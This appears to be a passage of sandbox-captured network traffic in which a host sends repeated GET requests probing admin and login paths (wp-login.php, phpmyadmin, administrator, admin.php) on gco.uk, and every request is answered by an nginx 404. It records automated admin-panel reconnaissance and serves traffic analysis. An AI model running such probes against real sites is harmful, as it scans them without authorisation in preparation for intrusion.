2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	58292	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:28 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	58975	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	219	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:28 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	59473	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	60152	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	60649	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:29 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	60873	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:29 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	61508	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:29 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	61511	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:29 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:29 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:29 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:29 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	62203	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:29 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:30 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:30 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	62889	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:30 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:30 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:30 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	64363	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:30 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:30 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:30 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.4	64588	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:30 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:30 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:30 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.4	65290	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
